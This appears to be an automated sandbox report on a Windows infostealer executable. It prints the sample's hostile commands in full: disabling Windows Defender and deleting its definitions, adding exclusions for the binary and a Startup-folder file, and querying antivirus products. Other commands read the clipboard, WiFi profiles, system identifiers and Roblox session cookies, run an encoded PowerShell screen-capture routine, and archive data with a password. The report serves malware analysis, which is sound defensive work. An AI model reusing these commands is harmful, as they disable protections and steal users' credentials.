              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeFile read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\program.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: program.exe, 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: program.exe, program.exe, 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: program.exe, program.exe, 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: program.exe, program.exe, 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: program.exe, program.exe, 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: program.exe, program.exe, 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: program.exe, program.exe, 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: program.exeReversingLabs: Detection: 44%
              Source: program.exeVirustotal: Detection: 46%
              Source: program.exeString found in binary or memory: set-addPolicy
              Source: program.exeString found in binary or memory: id-cmc-addExtensions
              Source: program.exeString found in binary or memory: --help
              Source: program.exeString found in binary or memory: --help
              Source: program.exeString found in binary or memory: can't send non-None value to a just-started async generator
              Source: program.exeString found in binary or memory: can't send non-None value to a just-started generator
              Source: program.exeString found in binary or memory: fma($module, x, y, z, /) -- Fused multiply-add operation. Compute (x * y) + z with a single round.
              Source: program.exeString found in binary or memory: various kinds of output. Setting it to 0 deactivates this behavior. PYTHON_HISTORY : the location of a .python_history file. These variables have equivalent command-line options (see --help for details): PYTHON_CPU_COUNT: override the retu
              Source: program.exeString found in binary or memory: various kinds of output. Setting it to 0 deactivates this behavior. PYTHON_HISTORY : the location of a .python_history file. These variables have equivalent command-line options (see --help for details): PYTHON_CPU_COUNT: override the retu
              Source: program.exeString found in binary or memory: can't send non-None value to a just-started coroutine
              Source: C:\Users\user\Desktop\program.exeFile read: C:\Users\user\Desktop\program.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\program.exe "C:\Users\user\Desktop\program.exe"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Users\user\Desktop\program.exe "C:\Users\user\Desktop\program.exe"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\program.exe'"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\program.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.cmdline"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES93BE.tmp" "c:\Users\user\AppData\Local\Temp\tgmup5d5\CSC93ACBC84BC674220B3501D9F22ECFDE.TMP"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\MBLSI.zip" *"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\MBLSI.zip" *
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
